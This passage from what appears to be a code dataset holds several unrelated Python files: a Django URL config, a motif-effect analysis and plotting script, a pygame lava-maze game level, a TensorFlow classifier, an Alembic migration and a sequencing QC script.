r\r\n\r\n\r\ndef main():\r\n    # print(os.path.abspath('../'))\r\n    url = r'http://www.ip138.com/ips138.asp'\r\n    r = get_url(url)\r\n    print(r.request.url)\r\n\r\n    print(r.text)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n\r\n\r\n","sub_path":"Basis_Learn/Requests_Learn.py","file_name":"Requests_Learn.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"438794869","text":"from django.conf.urls import url\nfrom .views import user_family_reg, edit_family, delete_family\n\napp_name = 
'housename'\n\nurlpatterns = [\n    url(r'^$', user_family_reg, name='HouseNameForms'),\n    url(r'^edit-family/(?P<id>\\d+)$', edit_family, name='edit_family'),\n    url(r'^delete-family/(?P<id>\\d+)$', delete_family, name='delete_family'),\n]","sub_path":"Gconnect/housename/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"130584290","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nimport matplotlib as mpl\nfrom matplotlib import rcParams\n\nimport pickle\n\nfont = {'size' : 12, }\naxes = {'labelsize': 'medium', 'titlesize': 'medium'}\n\nsns.set_context(\"talk\")\nsns.set_style(\"white\")\n\nmpl.rc('font', **font)\nmpl.rc('axes', **axes)\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\n# plt.rcParams['text.usetex'] = True\nplt.rcParams['axes.unicode_minus'] = True\n\n\ndef find_nearest_neighbours(current_combo, all_combos):\n    neighbours = []\n\n    min_nighbour_distance = 1e10\n\n    for idx, potential_neighbour in enumerate(all_combos):\n        if np.array_equal(potential_neighbour, current_combo):\n            continue\n\n        diff_combos = np.sum(np.absolute(np.subtract(potential_neighbour, current_combo)))\n\n\n        if abs(diff_combos) == min_nighbour_distance:\n            neighbours.append(idx)\n\n\n        elif abs(diff_combos) < min_nighbour_distance:\n            min_nighbour_distance = abs(diff_combos)\n            print(min_nighbour_distance)\n            print(current_combo)\n            print(potential_neighbour)\n            print(\"\")\n\n            neighbours = [idx]\n\n        else:\n            continue\n\n\n    return neighbours\n\n\ndef find_additive_nearest_neighbours(current_combo, all_combos, feature_idx, feature_name):\n    neighbour_idxs = []\n    min_nighbour_distance = 1e10\n\n    current_feature_value = current_combo[feature_idx]\n\n    # Subset for only models that have feature value + 1\n    subset_all_combos = all_combos.loc[all_combos[feature_name] == current_feature_value + 1]\n\n    for idx, row in subset_all_combos.iterrows():\n\n        candidate = row.values\n        if np.array_equal(candidate, current_combo):\n            continue\n\n        diff_combos = np.sum(np.absolute(np.subtract(candidate, current_combo)))\n\n\n        if abs(diff_combos) == min_nighbour_distance:\n            neighbour_idxs.append(idx)\n\n\n        elif abs(diff_combos) < min_nighbour_distance:\n            min_nighbour_distance = abs(diff_combos)\n\n            neighbour_idxs = [idx]\n\n        else:\n            continue\n\n    return neighbour_idxs\n\ndef get_motif_neighbours(output_dir, load_pickle=False, remove_zero_change=False):\n    model_space_report_df = pd.read_csv(output_dir + \"combined_model_space_report_with_motifs.csv\")\n    output_path = output_dir + \"motif_comparison.pdf\"\n\n    motif_columns = ['permissive_counts', 'dependent_counts',\n       'submissive_counts', 'hedonistic_counts',\n       'defensive_counts', 'logistic_counts', 'opportunistic_counts',\n       'exponential_counts']\n\n    motif_columns = ['SL1', 'SL2', 'SL3', 'SL4', 'OL1', 'OL2', 'OL3', 'OL4']\n\n    feature_effects_dict = {}\n    if load_pickle:\n        with open(output_dir + 'feature_effects_dict.pickle', 'rb') as handle:\n            feature_effects_dict = pickle.load(handle)\n\n    else:\n        for feature_idx, feature_name in enumerate(motif_columns):\n            feature_effects = []\n            n_additive_neighbours = 0\n\n            # Iterate all systems\n            for idx, row in model_space_report_df.iterrows():\n\n                
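# For each model, find the nearest neighbours that carry exactly one\n                # extra unit of the current motif; each difference in normalised\n                # marginal probability is one sample of that motif's additive effect.\n                # Illustrative example: for motif SL1, a model encoded (1, 0, ...)\n                # is compared against its closest neighbours encoded (2, 0, ...).\n                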
# Current model marginal\n                current_marginal = row['norm_marginal_means']\n\n                # Current encoded system\n                enc_system = row[motif_columns].values\n\n                neighbour_idxs = find_additive_nearest_neighbours(enc_system, model_space_report_df[motif_columns], feature_idx, feature_name)\n\n                n_additive_neighbours += len(neighbour_idxs)\n                neighbours_df = model_space_report_df[model_space_report_df.index.isin(neighbour_idxs)]\n                print(\"model_ref: \", row['model_idx'])\n                print(\"marginal mean: \", row['norm_marginal_means'])\n                print(\"\")\n\n                feature_effects += [x - current_marginal for x in neighbours_df['norm_marginal_means'].values]\n\n            feature_effects_dict[motif_columns[feature_idx]] = feature_effects\n\n        with open(output_dir + 'feature_effects_dict.pickle', 'wb') as handle:\n            pickle.dump(feature_effects_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n    if remove_zero_change:\n        for k in feature_effects_dict.keys():\n            k_values = feature_effects_dict[k]\n            k_values = [x for x in k_values if x != 0.0]\n            feature_effects_dict[k] = k_values\n\n\n    for k in feature_effects_dict.keys():\n        k_values = feature_effects_dict[k]\n        print(k,len(k_values))\n        feature_effects_dict[k] = k_values\n\n    print(\"\")\n\n    motif_stdev = []\n    motif_median = []\n    motif_data = []\n\n    all_data_names = []\n    all_data_points = []\n    all_data_medians = []\n\n    for f in motif_columns:\n        median_effect = np.median(feature_effects_dict[f])\n        effect_std = np.std(feature_effects_dict[f])\n        motif_stdev.append(effect_std)\n        motif_median.append(median_effect)\n        motif_data.append(feature_effects_dict[f])\n\n        for x in feature_effects_dict[f]:\n            all_data_names.append(f)\n            all_data_points.append(x)\n            all_data_medians.append(median_effect)\n\n\n    df_data = {'name': motif_columns, 'all_data': motif_data, 'median': motif_median, 'stdev': motif_stdev}\n    all_data_df = {'name': all_data_names, 'all_data_points': all_data_points, 'all_data_median': all_data_medians}\n    \n    all_data_df = pd.DataFrame(all_data_df)\n    # all_data_df.sort_values('all_data_median', inplace=True, ascending=False)\n    sorter = motif_columns\n    sorter_index = dict(zip(sorter,range(len(sorter))))\n    all_data_df['name_order'] = all_data_df['name'].map(sorter_index)\n    all_data_df.sort_values('name_order', inplace=True, ascending=True)\n\n    all_data_df.to_csv(output_dir + 'motif_datapoints.csv')\n    print(all_data_df.columns)\n\n    print(list(set(all_data_df['name'].values)))\n    diverging_colours = sns.color_palette(\"RdBu_r\", len(motif_columns) + 2)\n    diverging_colours.pop(5)\n    diverging_colours.pop(4)\n\n    output_path = output_dir + \"motif_comparison_boxplot_horz.pdf\"\n\n    height_inches = 3 * 77 / 25.4\n    width_inches = 3 * 85 / 25.4\n    fig, ax = plt.subplots(figsize=(width_inches, height_inches))\n\n    colour_list = ['#1d71b8', '#1d71b8', '#1d71b8', '#1d71b8', '#e30613', '#e30613', '#e30613', '#e30613']\n    custom_pal = sns.color_palette(colour_list)\n    # sns.barplot(x='name', y='mean', \n    #     data=analysis_df, alpha=0.9, ax=ax, palette=diverging_colours, vert=False)\n\n    # analysis_df.plot(\"name\", \"mean\", kind=\"barh\", color=diverging_colours, ax=ax, title='', width=1)\n    \n    if 1:\n        sns.stripplot(x=\"all_data_points\", y=\"name\", data=all_data_df, ax=ax, size=5,\n            orient=\"h\", palette=custom_pal, zorder=10)\n        sns.boxplot(x=\"all_data_points\", y=\"name\", data=all_data_df, ax=ax, orient=\"h\", palette=diverging_colours,\n            boxprops={'facecolor':'None'}, showfliers=False, linewidth=2)\n        \n    # whiskerprops={'linewidth':0, \"zorder\":0}, showcaps=False,\n    # plt.scatter()\n    ax.set_xlabel('')\n    
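# Axis titles and tick labels are blanked out below; presumably the\n    # exported PDF is annotated separately.\n    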
ax.set_yticklabels('')\n    ax.set_ylabel('')\n    ax.tick_params(labelsize=30)\n\n    ax.set(xlim=(None, None))\n    ax.set(ylim=(None, None))\n\n    ax.spines[\"right\"].set_visible(False)\n    ax.spines[\"top\"].set_visible(False)\n    ax.spines[\"bottom\"].set_visible(True)\n\n    ax.spines[\"bottom\"].set_alpha(0.5)\n    ax.spines[\"left\"].set_alpha(0.5)\n    ax.margins(x=0)\n    ax.margins(y=0)\n\n    ax.legend().remove()\n\n    fig.tight_layout()\n    plt.savefig(output_path, dpi=500, bbox_inches='tight')\n\n    output_path = output_dir + \"motif_comparison_box.pdf\"\n\n    if 1:\n        fig, ax = plt.subplots(figsize=(8.5, 5.11))\n\n        # sns.stripplot(x=\"all_data_points\", y=\"name\", data=all_data_df, ax=ax, size=4,\n        #     orient=\"h\", palette=diverging_colours, zorder=10)\n        sns.violinplot(x=\"all_data_points\", y=\"name\", data=all_data_df, ax=ax, orient=\"h\", color=\"white\", \n            showfliers=False, linewidth=2, width=0.9, scale_hue=False, saturation=1.0\n            )\n        ax.collections[0].set_edgecolor(diverging_colours)\n\n        ax.set_xlabel('normalised marginal change')\n        ax.set_yticklabels([])\n        ax.set_ylabel('')\n\n        ax.spines[\"right\"].set_visible(False)\n        ax.spines[\"top\"].set_visible(False)\n        ax.spines[\"bottom\"].set_visible(True)\n\n        ax.spines[\"bottom\"].set_alpha(0.5)\n        ax.spines[\"left\"].set_alpha(0.5)\n\n        ax.legend().remove()\n\n        fig.tight_layout()\n        plt.savefig(output_path, dpi=500)\n\n    plt.rcParams['ytick.left'] = False\n    plt.rcParams['xtick.bottom'] = False\n\n    plt.minorticks_on()\n\n    width_inches = 200 / 25.4\n    height_inches = 120 / 25.4\n\n    fig, axes = plt.subplots(ncols=2, nrows=int(len(motif_columns)/2), figsize=(width_inches, height_inches))\n    output_path = output_dir + \"motif_kde.pdf\"\n    bins = np.arange(-1, 1.1, 0.1)\n    print(bins)\n    idx = 0\n\n\n    for ax, motif_name in zip(axes.flat, motif_columns):\n        \n        sns.distplot(feature_effects_dict[motif_name], bins=bins, norm_hist=False, kde=False, hist=True, ax=ax, label=motif_name, color=colour_list[idx], hist_kws={'range': (-1, 1), 'linewidth': 0.0, 'alpha': 1.0})\n\n        ax.spines[\"right\"].set_visible(False)\n        ax.spines[\"top\"].set_visible(False)\n        ax.spines[\"bottom\"].set_visible(True)\n\n        ax.spines[\"bottom\"].set_alpha(0.5)\n        ax.spines[\"left\"].set_alpha(0.5)\n        ax.set_yscale('log')\n        ax.set_ylim([1, 10**4])\n        ax.set_yticks([1, 10**2, 10**4], minor=False)\n        ax.set_xticks([-1, 0, 1], minor=False)\n\n        ax.set_xlim(-1, 1)\n        ax.set_yticklabels('')\n        ax.set_ylabel('')\n        ax.set_xticklabels('')\n\n        idx += 1\n\n    fig.tight_layout()\n    plt.savefig(output_path, dpi=500)\n\n\ndef test():\n    a = [0, 0, 0]\n    b = [1, 0, 0]\n    c = [2, 2, 0]\n    d = [0, 0, 1]\n\n    marginal_a = 0.05\n    marginal_b = 0.5\n    marginal_c = 0.3\n    marginal_d = 0.15\n\n    feature_idxs = list(range(3))\n\n\n    models = [a, b, c, d]\n\n    for x in feature_idxs:\n\n        # Check if adding the feature to the model results in a change in model marginal probability\n        for m in models:\n\n            min_nighbour_distance = 100\n            neighbours = []\n\n            # Find nearest neighbours to m\n            for neigh_idx, potential_neighbour in enumerate(models):\n\n                if m == potential_neighbour:\n                    continue\n\n                # compare m against the candidate neighbour, not against the fixed model a\n                if abs(sum(m) - sum(potential_neighbour)) == min_nighbour_distance:\n                    neighbours.append(potential_neighbour)\n\n\n                elif abs(sum(m) - sum(potential_neighbour)) < min_nighbour_distance:\n                    min_nighbour_distance = abs(sum(m) - sum(potential_neighbour))\n                    neighbours = [potential_neighbour]\n\n                else:\n                    continue\n\n            # From neighbours, find those that have 1 extra of feature\n            for n in neighbours:\n                if n[x] == m[x] + 1:\n                    print(x, n)\n\nif __name__ == \"__main__\":\n    
test()\n","sub_path":"data_analysis/nearest_neighbours.py","file_name":"nearest_neighbours.py","file_ext":"py","file_size_in_byte":11306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"425295759","text":"import person, movements1\r\n\r\nimport sys\r\nimport os\r\nimport time\r\nimport math\r\nimport tiledtmxloader\r\nfrom pygame import mixer\r\nimport pygame\r\ntry:\r\n    import _path\r\nexcept:\r\n    pass\r\nimport palace\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\ndef main():\r\n    \r\n    demo_pygame('./maps/palace.tmx')\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\ndef demo_pygame(file_name):\r\n    \"\"\"\r\n    Example showing how to use the parallax scrolling feature.\r\n    \"\"\"\r\n    \r\n    HERO_HEALTH = 100\r\n    file = './sounds/lava_back.ogg'\r\n    # parse the map (it is done here to initialize the\r\n    # window the same size as the map if it is small enough)\r\n    world_map = tiledtmxloader.tmxreader.TileMapParser().parse_decode(file_name)\r\n    # load the sound effects into mixer and the main background track into the mixer stream\r\n    mixer.init()\r\n    sound_fall = mixer.Sound('./sounds/scream2.ogg')\r\n    mixer.music.load(file)\r\n    mixer.music.play(-1)\r\n    # init pygame and set up a screen\r\n    pygame.display.set_caption(\"tiledtmxloader - \" + file_name + \\\r\n        \" - keys: arrows, 0-9\")\r\n    screen_width = min(1024, world_map.pixel_width)\r\n    screen_height = min(768, world_map.pixel_height)\r\n    screen = pygame.display.set_mode((screen_width, screen_height))\r\n\r\n    # load the images using pygame\r\n    resources = tiledtmxloader.helperspygame.ResourceLoaderPygame()\r\n    resources.load(world_map)\r\n\r\n    # prepare map rendering\r\n    assert world_map.orientation == \"orthogonal\"\r\n\r\n    # renderer\r\n    renderer = tiledtmxloader.helperspygame.RendererPygame()\r\n\r\n    # create hero sprite\r\n    # use floats for hero position\r\n    hero_pos_x = 32*32 #32*32\r\n    hero_pos_y = 39*32 + 20 #19*32\r\n    hero = person.create_person(hero_pos_x, hero_pos_y ,'./images/hero_u2.png')\r\n    hero_width = hero.rect.width\r\n    hero_height = 5\r\n    # placing the chest sprite that holds the key\r\n    chest = person.create_person(29*32+16,17*32,'./images/closed_chest.png')\r\n    \r\n    # cam_offset is for scrolling\r\n    cam_world_pos_x = 1024/2\r\n    cam_world_pos_y = 768/2\r\n    # set initial cam position and size\r\n    renderer.set_camera_position_and_size(cam_world_pos_x, cam_world_pos_y, \\\r\n        screen_width, screen_height)\r\n\r\n    # retrieve the layers\r\n    sprite_layers = tiledtmxloader.helperspygame.get_layers_from_map(resources)\r\n\r\n    # filter layers\r\n    sprite_layers = [layer for layer in sprite_layers if not layer.is_object_group]\r\n\r\n    # add the hero to the right layer, it can be changed using 0-9 keys\r\n    sprite_layers[3].add_sprite(hero)\r\n    sprite_layers[2].add_sprite(chest)\r\n    \r\n    # set up timer for fps printing\r\n    pygame.time.set_timer(pygame.USEREVENT, 1000)\r\n    \r\n    # variables for the main loop\r\n    clock = pygame.time.Clock()\r\n    running = True\r\n    speed = 2.75\r\n    mr=ml=md=mu=0\r\n    lava_list = []\r\n    # set up the direction offsets to check for each tile of a 4-tile section of the map\r\n    \"\"\"\r\n    Each tile of a walkable 4-tile section is connected to 2 other 4-tile sections.\r\n    Only while the hero stands on that tile are those 2 neighbouring sections shown\r\n    as lava or not lava (walkable or not walkable). The offsets to the 2 neighbouring\r\n    sections are stored in dirx and diry for each of the 4 tiles of a section.\r\n    \"\"\"\r\n    dirx = [[0 for x in range(2)] for x in range(4)]\r\n    diry = [[0 for x in range(2)] for x in range(4)]\r\n    dirx[0][0] = -1 \r\n    dirx[0][1] = 0 \r\n    dirx[1][0] = 0\r\n    dirx[1][1] = 1\r\n    dirx[2][0] = -1\r\n    dirx[2][1] = 0\r\n    dirx[3][0] = 1\r\n    dirx[3][1] = 0\r\n    diry[0][0] = 0\r\n    diry[0][1] = -1\r\n    diry[1][0] = -1\r\n    diry[1][1] = 0\r\n    diry[2][0] = 0\r\n    diry[2][1] = 1\r\n    diry[3][0] = 0\r\n    diry[3][1] = 1\r\n    # store the walkable path in the matrix by loading the tile data from the 2nd layer of the map\r\n    matrix = [[None for x in range(10)] for x in range(10)]\r\n    \r\n    for i in range(10 ):\r\n        for j in range(10):\r\n            if sprite_layers[1].content2D[(10+i)*2][(10+j)*2] is None:\r\n                matrix[i][j] = create_lava(10+j,10+i)#opp in case of content2D\r\n                #sprite_layers[2].add_sprite(matrix[i][j])\r\n                lava_list.append(matrix[i][j].rect)\r\n                #sys.stdout.write('1 ')\r\n            #else: sys.stdout.write('0 ')\r\n        #print \" \"\r\n    # for storing the currently visible lava and editing it dynamically along with the motion of the hero\r\n    active_list = []\r\n    # stores the last position of the hero\r\n    old = (-1,-1)\r\n    flag = 0\r\n    portal = False  # becomes True only when the hero exits through the right door\r\n    # 3 portals for the chest and the 2 gates\r\n    portal1 = pygame.Rect(28*32,15*32,96,64)#key place\r\n    portal2 = pygame.Rect(21*32,10*32,96,96)#left door\r\n    portal3 = pygame.Rect(35*32,10*32,96,96)#right door\r\n    # mainloop\r\n    while running:\r\n        dt = clock.tick(40)\r\n\r\n        # event handling\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                running = False\r\n            elif event.type == pygame.USEREVENT:\r\n                print(\"fps: \", clock.get_fps())\r\n            elif event.type == pygame.KEYDOWN:\r\n                if event.key == pygame.K_ESCAPE:\r\n                    running = False\r\n            \r\n        \r\n        # find directions\r\n        #print pygame.key.get_pressed()[pygame.K_SPACE]    \r\n        mov = movements1.hero_move(mr,ml,md,mu,hero_pos_x,hero_pos_y,hero,speed,sprite_layers[4])\r\n        mr = mov[0]\r\n        ml = mov[1]\r\n        md = mov[2]\r\n        mu = mov[3]\r\n        hero_pos_x = mov[4]\r\n        hero_pos_y = mov[5]\r\n        # stop the fast music after crossing the path of lava\r\n        if(hero_pos_y < 20 *32):\r\n            mixer.music.stop()\r\n        if(flag == 0 and portal1.collidepoint(hero.rect.midtop)):\r\n            #print \"collision detected\"\r\n            # checking for the key taken from the chest\r\n            \r\n            if(pygame.key.get_pressed()[pygame.K_SPACE]==1):\r\n                flag = 1\r\n                chest.image = pygame.image.load('./images/open_chest.png')\r\n                key_riddle=person.create_person(hero.rect.centerx,hero.rect.centery+200,'./images/lava_riddle.png')\r\n                sprite_layers[3].add_sprite(key_riddle)\r\n                #ring_take.rect.topleft=(1,1)\r\n                for sprite_layer in sprite_layers:\r\n                    if sprite_layer.is_object_group:\r\n                        # we dont draw the object group layers\r\n                        # you should filter them out if not needed\r\n                        continue\r\n                    else:\r\n                        renderer.render_layer(screen, sprite_layer)\r\n\r\n                pygame.display.flip()\r\n                i=0\r\n                while(i!=1): ##Infinite loop until menu is to be removed\r\n                    for event in pygame.event.get():\r\n                        if (event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE):\r\n                            i=1\r\n                            continue\r\n                sprite_layers[3].remove_sprite(key_riddle)\r\n                #print \"detected key here\"\r\n            # code for taking the key and showing the riddle\r\n        elif(flag == 1 and portal2.collidepoint(hero.rect.midtop)):\r\n            # the wrong decision: start from the beginning\r\n            if(pygame.key.get_pressed()[pygame.K_SPACE]==1):\r\n                hero_pos_x = 32 * 32\r\n                hero_pos_y = 40 * 32\r\n                mixer.music.play()\r\n        elif(flag == 1 and portal3.collidepoint(hero.rect.midtop)):\r\n            #if the right path is chosen, change to the next map\r\n            
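# A SPACE press at the right-hand door marks a successful run: the\r\n            # portal flag (initialised before the main loop) is set and the\r\n            # loop is left so the next map can be started.\r\n            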
if(pygame.key.get_pressed()[pygame.K_SPACE]==1):\r\n                #condition on successful transition\r\n                #print \"detected right path\"\r\n                #music.mixer.stop()\r\n                portal=True\r\n                running=False\r\n        # check the midbottom of the hero (foot); if it is inside any rectangle of the tiles in active_list, the hero is dead\r\n        for i in range(len(active_list)):\r\n            if(active_list[i].rect.collidepoint(hero.rect.midbottom)):\r\n                hero_pos_x = 32 * 32 \r\n                hero_pos_y = 40 * 32\r\n                mixer.music.stop()\r\n                sound_fall.play()\r\n                time.sleep(2)\r\n                mixer.music.play()\r\n        #update the active_list with the position of the hero\r\n        x_tile = int(hero_pos_x // 32)\r\n        y_tile = int(hero_pos_y // 32)\r\n        new = (x_tile, y_tile)\r\n        # store the tile number of the hero\r\n        if(old != new):\r\n            # this check only runs when the hero has changed tiles, for fast processing\r\n            if(len(active_list)>0):\r\n                # empty out the previous active list\r\n                while( len(active_list) > 0):\r\n                    sprite_layers[2].remove_sprite(active_list[0])\r\n                    active_list.pop(0)\r\n            # get the tile number within the 4-tile section, to select the direction from the direction dataset defined above\r\n            n = get_tile_no(x_tile, y_tile)\r\n            \r\n            for i in range(2):\r\n                # check whether the new tile sections are inside the matrix loaded above\r\n                x = ((x_tile + dirx[n][i])//2 - 10)\r\n                y = ((y_tile + diry[n][i])//2 - 10)\r\n                if( 0 <= x <10 and 0 <= y < 10 ):\r\n                    if(matrix[y][x] is not None and not sprite_layers[2].contains_sprite(matrix[y][x])):\r\n                        # append the kill tiles to the active list\r\n                        sprite_layers[2].add_sprite(matrix[y][x])\r\n                        active_list.append(matrix[y][x])\r\n\r\n        \r\n        #renderer.set_camera_position(hero.rect.centerx, hero.rect.centery)\r\n        # move the camera position according to the hero location in the map\r\n        cam_pos_x = hero.rect.centerx\r\n        cam_pos_y = hero.rect.centery\r\n        if hero.rect.centerx <= 520 :\r\n            cam_pos_x = 520\r\n        elif hero.rect.centerx >=((42*32)-530):\r\n            cam_pos_x = ((42*32)-530)\r\n        if hero.rect.centery >= 44*32-400:\r\n            cam_pos_y = 44*32-400\r\n        elif hero.rect.centery <=408:\r\n            cam_pos_y = 408\r\n        renderer.set_camera_position(cam_pos_x,cam_pos_y)\r\n\r\n        # clear screen, might be left out if every pixel is redrawn anyway\r\n        screen.fill((0, 0, 0))\r\n\r\n        # render the map\r\n        for sprite_layer in sprite_layers:\r\n            if sprite_layer.is_object_group:\r\n                # we dont draw the object group layers\r\n                # you should filter them out if not needed\r\n                continue\r\n            else:\r\n                renderer.render_layer(screen, sprite_layer)\r\n\r\n        pygame.display.flip()\r\n\r\n    if portal:\r\n        palace.main()\r\n\r\n# -----------------------------------------------------------------------------\r\ndef create_lava(tile_64_x, tile_64_y):\r\n    # create a lava sprite at the given tile position with a size equal to 4 tiles\r\n    image = pygame.image.load('./images/lava.png')\r\n    rect = image.get_rect()\r\n    rect.midbottom = ((tile_64_x * 64)+32, (tile_64_y * 64) +64)\r\n    return tiledtmxloader.helperspygame.SpriteLayer.Sprite(image, rect)\r\n\r\ndef get_tile_no(x,y):\r\n    # get the tile number within a 4-tile section\r\n    if x%2==0 and y%2 ==0:\r\n        return 0\r\n    elif x%2 == 1 and y%2 == 1 :\r\n        return 3\r\n    elif x%2 == 0 and y%2 == 1:\r\n        return 2\r\n    else:\r\n        return 1\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n\r\n\r\n","sub_path":"source 
code/pal_lava.py","file_name":"pal_lava.py","file_ext":"py","file_size_in_byte":11666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"328931333","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\n\n# flags\ntraining_step = 2000\ndata_dim = 784\nbatch_number = 6\nbatch_size = 13*15*10\ndir = 'data/data_provided/'\n\n# prepare data\nbatch0 = np.load(dir+'batch0.npy')\nbatch1 = np.load(dir+'batch1.npy')\nbatch2 = np.load(dir+'batch2.npy')\nbatch3 = np.load(dir+'batch3.npy')\nbatch4 = np.load(dir+'batch4.npy')\nbatch5 = np.load(dir+'batch5.npy')\nlabel = np.load(dir+'label.npy')\n\ntraindata = np.vstack([batch0, batch1])\ntrainlabel = np.hstack([label, label])\ntestdata = np.vstack([batch4])\ntestlabel = np.hstack([label])\n\n\n# Specify that all features have real-value data\n# feature_columns is a list\nfeature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=data_dim)]\n\n# Build a DNN with a single hidden layer of 100 units.\nclassifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns,\n                                            hidden_units=[100],\n                                            n_classes=10,\n                                            optimizer=tf.train.ProximalAdagradOptimizer(\n                                                learning_rate=0.1,\n                                                l1_regularization_strength=0.001\n                                            ),\n                                            model_dir=\"data/log\")\n\n# Fit model.\nclassifier.fit(x=traindata.astype('float32'),\n               y=trainlabel.astype('int32'),\n               steps=training_step)\n\n# Evaluate accuracy.\naccuracy_score = classifier.evaluate(x=testdata.astype('float32'),\n                                     y=testlabel.astype('int32'))[\"accuracy\"]\nprint('Accuracy: {0:f}'.format(accuracy_score))\n\n# Predict classes for the test samples.\ny = list(classifier.predict(testdata.astype('float32'), as_iterable=True))\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"141607482","text":"\"\"\"empty message\n\nRevision ID: 73c826f0fb93\nRevises: 02c353311e35\nCreate Date: 2021-08-16 17:01:02.023364\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '73c826f0fb93'\ndown_revision = '02c353311e35'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('month',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('created', sa.DateTime(), nullable=True),\n    sa.Column('modified', sa.DateTime(), nullable=True),\n    sa.Column('order', sa.Numeric(), nullable=True),\n    sa.Column('label', sa.String(), nullable=False),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.add_column('plant', sa.Column('harvest_day', sa.Integer(), nullable=True))\n    op.add_column('plant', sa.Column('sprout_day', sa.Integer(), nullable=True))\n    op.add_column('plant', sa.Column('start_day', sa.Integer(), nullable=True))\n    op.add_column('plant', sa.Column('transplant_day', sa.Integer(), nullable=True))\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_column('plant', 'transplant_day')\n    op.drop_column('plant', 'start_day')\n    op.drop_column('plant', 'sprout_day')\n    op.drop_column('plant', 'harvest_day')\n    op.drop_table('month')\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/73c826f0fb93_.py","file_name":"73c826f0fb93_.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"435153609","text":"#!/usr/bin/env python\n\"\"\"\nSpyder Editor\n\nauthor: lml\n\nMiSeq sequencing quality report\n\"\"\"\nimport os\nimport argparse\n\ndef readGenus(path):\n    ret = {}\n    names = []\n    with open(path) as f:\n        l0 = f.readline()\n        for x in l0.strip().split('\\t')[1:]:\n            ret[x[:10]] = {}\n            names.append(x[:10])\n        for l in f:\n            l2 = l.strip().split('\\t')\n            for i in range(len(names)):\n                ret[names[i]][l2[0]] = l2[i+1]\n    return ret\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='QC')\n    parser.add_argument('-f','--file',required=True,action ='append',help='genus.xls file for two batches')\n    parser.add_argument('-o','--out',help='out path')\n    args = parser.parse_args()\n    fs = args.file\n    outfile = args.out\n    if outfile is None:\n        outfile = 'QC_'+'_'.join([x.replace('genus','').replace('.xls','') for x in fs])+'.txt'\n    d1 = readGenus(fs[0])\n    d2 = readGenus(fs[1])\n\n    qcid = [x for x in d1.keys() if x in d2.keys()]\n    #with open('aaa.txt','w') as f:\n        #f.write(','.join(qcid))\n    if len(qcid)==0:\n        raise Exception('No identical Pid encountered')\n    genusid = set([x for x in d1[qcid[0]].keys()]+[x for x in d2[qcid[0]].keys()])\n\n    newarray = []\n    newarray.append(['Taxon']+[x for x in genusid])\n    for x in qcid:\n        newarray.append([x]+[d1[x].get(y,'0') for y in genusid])\n        newarray.append([x+'qc']+[d2[x].get(y,'0') for y in genusid])\n\n    res = [x for x in zip(*newarray)]\n    with open(outfile,'w') as f:\n        for x in res:\n            f.write('\\t'.join(x)+'\\n')\n    os.system('python /var/s5/script/QC/ggplot2_bar_box_bubble.py -i {} -p 0.01'.format(outfile))\n    os.system('rm gg*r')\n\nif __name__=='__main__':\n    main()\n","sub_path":"script/QC/QC.py","file_name":"QC.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"182123190","text":"import tensorflow as tf\nimport csv\nimport os\nimport numpy as np\nimport tf_metrics\nfrom utils.custom_hook import EvalResultHook, PrintValueHook\n\n# In case of needing l2-regularization: https://stackoverflow.com/questions/44232566/add-l2-regularization-when-using-high-level-tf-layers/44238354#44238354\ninitilizer = \"he_uniform\"\n\n\n# Default stride of 1, padding: valid\ndef cnn_1d(inp,\n           conv_filter_size,  # [Scalar]\n           num_filters,  # [Scalar]\n           mode,\n           activation=tf.nn.relu,\n           stride=1,\n           padding='valid',\n           input_shape=None,\n           name='', kernel_regularizer=0.0):  # Stride of CNN\n    # We shall define the weights that will be trained using create_weights function.\n    if input_shape is None:\n        layer = tf.keras.layers.Conv1D(num_filters, conv_filter_size, strides=stride, padding=padding,\n                                       activation=activation, kernel_initializer=initilizer,\n                                       kernel_regularizer=tf.keras.regularizers.l2(kernel_regularizer), name=name)\n        output = layer(inp)\n    else:\n        layer = tf.keras.layers.Conv1D(num_filters, conv_filter_size, strides=stride, padding=padding,\n                                       activation=activation, input_shape=input_shape, kernel_initializer=initilizer,\n                                       kernel_regularizer=tf.keras.regularizers.l2(kernel_regularizer), name=name)\n        output = layer(inp)\n    return 
